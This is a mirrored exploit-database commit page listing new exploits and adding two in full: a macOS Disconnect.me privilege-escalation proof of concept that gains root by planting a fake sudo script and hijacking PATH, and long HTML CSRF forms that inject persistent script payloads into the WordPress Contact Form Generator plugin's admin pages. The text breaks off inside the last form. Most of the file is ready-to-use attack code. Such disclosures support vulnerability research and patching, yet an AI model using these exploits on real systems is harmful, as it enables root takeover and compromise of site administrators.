bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-07

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2015-09-07 05:02:07 +00:00
parent a15ab9b097
commit 488f57ec93
8 changed files with 1239 additions and 601 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -34384,7 +34384,13 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0

Can't render this file because it is too large.

30
platforms/osx/local/38089.txt Executable file
View file

@ -0,0 +1,30 @@
Disconnect.me is the search engine entrusted by the Tor Browser.
Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day).
Original Download <= v2.0: https://disconnect.me/premium/mac
Archived Download: http://d-h.st/LKqG
Disconnect+Desktop.pkg: sha256 = bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7
https://www.virustotal.com/en/file/bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7/analysis/
PoC:
"""
$ id
uid=501(...) gid=20(staff) ...
$ cat /tmp/sudo
#!/bin/bash
/usr/bin/id
/bin/bash
$ chmod +x /tmp/sudo
$ PATH=/tmp "/Library/Application Support/disconnect/stopvpn"
uid=0(root) gid=0(wheel) ...
# /usr/bin/whoami
root
"""
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen

667
platforms/php/webapps/38086.html Executable file
View file

@ -0,0 +1,667 @@
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img&#32;src&#61;x>" />
<input type="hidden" name="id&#95;form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="tooltip&#95;text" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="id&#95;form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="column&#95;type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="field&#95;margin&#95;top" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa&quot;&gt;&lt;img&#32;src&#61;x&gt;" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;587&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;588&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;131&#93;" value="inherit" />
<input type="hidden" name="styles&#91;589&#93;" value="1" />
<input type="hidden" name="styles&#91;629&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;630&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;627&#93;" value="0" />
<input type="hidden" name="styles&#91;0&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;130&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;517&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;518&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;1&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;2&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;3&#93;" value="solid" />
<input type="hidden" name="styles&#91;4&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;5&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;6&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;7&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;8&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;9&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;10&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;11&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;12&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;13&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;14&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;15&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;16&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;17&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;18&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;19&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;600&#93;" value="0" />
<input type="hidden" name="styles&#91;601&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;602&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;603&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;604&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;605&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;606&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;607&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;608&#93;" value="solid" />
<input type="hidden" name="styles&#91;609&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;610&#93;" value="0" />
<input type="hidden" name="styles&#91;611&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;612&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;613&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;614&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;615&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;616&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;617&#93;" value="0" />
<input type="hidden" name="styles&#91;618&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;619&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;620&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;621&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;622&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;623&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;624&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;625&#93;" value="solid" />
<input type="hidden" name="styles&#91;626&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;20&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;21&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;22&#93;" value="normal" />
<input type="hidden" name="styles&#91;23&#93;" value="normal" />
<input type="hidden" name="styles&#91;24&#93;" value="none" />
<input type="hidden" name="styles&#91;25&#93;" value="left" />
<input type="hidden" name="styles&#91;506&#93;" value="inherit" />
<input type="hidden" name="styles&#91;510&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;27&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;28&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;29&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;30&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;190&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;191&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;192&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;502&#93;" value="left" />
<input type="hidden" name="styles&#91;193&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;194&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;195&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;196&#93;" value="solid" />
<input type="hidden" name="styles&#91;197&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;198&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;199&#93;" value="normal" />
<input type="hidden" name="styles&#91;200&#93;" value="normal" />
<input type="hidden" name="styles&#91;201&#93;" value="none" />
<input type="hidden" name="styles&#91;202&#93;" value="inherit" />
<input type="hidden" name="styles&#91;511&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;203&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;204&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;205&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;206&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;215&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;216&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;217&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;218&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;31&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;32&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;33&#93;" value="normal" />
<input type="hidden" name="styles&#91;34&#93;" value="normal" />
<input type="hidden" name="styles&#91;35&#93;" value="none" />
<input type="hidden" name="styles&#91;36&#93;" value="left" />
<input type="hidden" name="styles&#91;507&#93;" value="inherit" />
<input type="hidden" name="styles&#91;512&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;37&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;38&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;39&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;40&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;41&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;42&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;43&#93;" value="normal" />
<input type="hidden" name="styles&#91;44&#93;" value="normal" />
<input type="hidden" name="styles&#91;509&#93;" value="inherit" />
<input type="hidden" name="styles&#91;46&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;47&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;48&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;49&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;505&#93;" value="white" />
<input type="hidden" name="styles&#91;508&#93;" value="inherit" />
<input type="hidden" name="styles&#91;132&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;133&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;168&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;519&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;520&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;500&#93;" value="left" />
<input type="hidden" name="styles&#91;501&#93;" value="left" />
<input type="hidden" name="styles&#91;134&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;135&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;136&#93;" value="solid" />
<input type="hidden" name="styles&#91;137&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;138&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;139&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;140&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;141&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;142&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;143&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;144&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;145&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;146&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;147&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;148&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;149&#93;" value="normal" />
<input type="hidden" name="styles&#91;150&#93;" value="normal" />
<input type="hidden" name="styles&#91;151&#93;" value="none" />
<input type="hidden" name="styles&#91;152&#93;" value="inherit" />
